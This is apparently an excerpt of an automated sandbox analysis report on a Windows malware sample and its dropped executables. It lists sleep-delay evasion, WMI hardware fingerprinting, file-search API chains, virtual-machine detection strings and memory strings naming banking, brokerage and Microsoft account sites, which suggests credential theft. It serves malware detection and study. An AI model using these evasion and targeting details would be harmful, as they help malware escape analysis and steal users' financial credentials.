Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -37315s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -50777s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -32711s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -44204s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -47590s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -42016s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -57105s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -31420s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -55443s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -32874s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -53246s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -36387s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -30526s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -49116s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -49257s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -34086s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -32936s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -56412s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -52526s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -32075s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -50036s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -33728s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -41881s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -46955s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -36684s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8128 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -58111s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -31319s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748 Thread sleep time: -49340s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7172 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0041D8B1 FindFirstFileExA, 0_2_0041D8B1
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Code function: 0_2_0368DB18 FindFirstFileExA, 0_2_0368DB18
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_004015C0 VirtualProtect,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 2_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 2_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Code function: 3_2_6C72261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 3_2_6C72261E
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_00401120 GetSystemInfo,ExitProcess, 2_2_00401120
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 35511
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 40234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 48864
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 32845
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 51147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30442
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 53347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 49843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 36423
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 40238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 47963
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30339
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 36388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 34666
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 53467
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 38120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 35343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 54129
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 35309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 34492
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 44719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 49642
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 35996
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 50222
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 52005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 36184
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 50385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 42138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 40532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 32671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 52225
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 53819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 41500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 51726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 34731
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 48714
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 50658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 49494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 32649
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 44342
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 45027
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30663
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 59755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 37315
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 50777
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 32711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 44204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 47590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 42016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 57105
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 31420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 55443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 32874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 53246
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 36387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 49116
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 49257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 34086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 32936
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 56412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 52526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 32075
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 50036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 33728
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 41881
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 46955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 36684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 58111
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 31319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 49340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Users\user\AppData\Local\Temp\u2ts.2
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Users\user\AppData\Local
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Datacenter without Hyper-V Core
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1!0
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: sx8RE6LbG0.exe, 00000000.00000002.2424148242.0000000001D9F000.00000004.00000020.00020000.00000000.sdmp, sx8RE6LbG0.exe, 00000000.00000003.2153198605.0000000001D2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Aapi.dllHyper-V RAW
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001AB6000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.0
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: VMWARE_VIRTUAL
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noreply@vmware.com0
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: sx8RE6LbG0.exe, 00000000.00000003.2075342633.00000000037BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BB'
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Datacenter without Hyper-V Full
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Enterprise without Hyper-V Full
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Microsoft Hyper-V Server
Source: sx8RE6LbG0.exe, 00000000.00000003.2075627426.0000000003782000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_
Source: u2ts.0.exe, 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware$[
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: QEMU_HARDU
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Standard without Hyper-V Full
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: Enterprise without Hyper-V Core
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0/
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: MSBuild.exe, 00000012.00000002.3240515596.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: u2ts.0.exe, 00000002.00000003.2098313435.000000002815C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
